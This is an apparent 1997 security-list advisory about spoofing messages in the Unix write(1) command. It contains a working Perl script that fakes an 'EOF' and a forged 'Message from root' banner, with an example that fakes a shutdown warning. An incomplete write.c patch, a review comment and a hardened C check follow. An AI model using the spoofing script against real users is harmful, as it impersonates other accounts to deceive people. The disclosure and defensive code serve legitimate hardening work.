write(1)

test (butafuco@MC.NET)
Wed, 21 May 1997 21:53:30 -0500

Program Affected: write(1)
Impact: Mostly Harmless

It is trivial to spoof a write from one user to the next locally
on a system by faking an "EOF". This of course does not affect
users who have turned off their write permissions. It's also
fairly noticeable by the lack of any beep.

-------------------------------swrite-----------------------------------------
#!/usr/contrib/bin/perl
# (NO C) intellectual property is theft... butafuco@mc.net

if(@ARGV < 2) {
print "\n Usage: swrite target from [tty]\n";
exit 0;
}

while (<STDIN>){
chop($line = $_);
push @to_write, $line;
}

$oopsmessage = "oops... sorry :\)\n";
$wait = 30;
$delay = 2;
chop($host = `hostname`);
$terminal = "console";
if(@ARGV > 2){
$terminal = $ARGV[2];
}

open(JIM, "|write $ARGV[0]");
select(JIM);
$| =1;
sleep $delay;
print(JIM $oopsmessage);
print(JIM "EOF\n");

sleep $wait;
chop($time = `date +%H:%M`);

print(JIM "\nMessage from $ARGV[1]\@$host on $terminal at $time ...\n");
foreach $line (@to_write){
sleep $delay;
print (JIM "$line\n");
}
$| = 0;
close(JIM);
-------------------------------swrite----------------------------------------

example usage...

Un*x % echo The System is going down IMMIDIATELY\! | ./swrite \
user root console

If you're an absolute paranoid, here are the diffs of an incomplete
patch for write.c. It's a start anyhow.

281c281,284
< while (fgets(line, sizeof(line), stdin) != NULL)

---
>       while (fgets(line, sizeof(line), stdin) != NULL){
>               if(!strcmp(line, "EOF\n")){
>                       (void)strcpy(line, "EOF <-- Warning: Not End of File.\n");
>               }
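Review bot: The strcmp(line, "EOF\n") test in the new loop body matches only that exact string, so a sender line with trailing or leading whitespace around "EOF" is relayed unmarked. Strip surrounding whitespace before comparing, and consider marking relayed lines that begin with "Message from" as well, since the script above follows its fake "EOF" with a forged banner of that form. The strcpy also assumes line can hold the 35-byte replacement string including its terminator; the declaration of line is not visible here, so bound the copy by sizeof(line).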
282a286
>       }

It'll work for "EOF" just not for "EOF " or "EOF " etc...
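
One way to close the whitespace gap noted above, as an added example that is not part of the original post or of write.c: the check ignores blanks around "EOF" and also catches a forged "Message from" banner. The function names and the "[sender text] " prefix are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Return 1 if a line typed by the sender could be mistaken for write's
 * own output: the "EOF" terminator with any surrounding whitespace, or a
 * line starting with the "Message from " banner. */
static int looks_forged(const char *line)
{
    const char *p = line;
    size_t n;

    while (isspace((unsigned char)*p))          /* skip leading blanks */
        p++;
    n = strlen(p);
    while (n > 0 && isspace((unsigned char)p[n - 1]))
        n--;                                    /* ignore trailing blanks */
    if (n == 3 && strncmp(p, "EOF", 3) == 0)
        return 1;
    return strncmp(p, "Message from ", 13) == 0;
}

/* Copy line into out, prefixing suspicious lines so the recipient can tell
 * sender-typed text from the program's own banner. Returns 1 if marked. */
static int mark_line(const char *line, char *out, size_t outsz)
{
    int forged = looks_forged(line);

    snprintf(out, outsz, "%s%s", forged ? "[sender text] " : "", line);
    return forged;
}

int main(void)
{
    /* Constructed sample input, not captured from a real session. */
    const char *sample[] = {
        "oops... sorry :)\n", "EOF\n", "EOF  \n", "  EOF\t\n",
        "Message from root@host on console at 21:53 ...\n",
        "EOFfice hours moved\n",
    };
    char out[256];
    size_t i;

    for (i = 0; i < sizeof(sample) / sizeof(sample[0]); i++) {
        mark_line(sample[i], out, sizeof(out));
        fputs(out, stdout);
    }
    return 0;
}
```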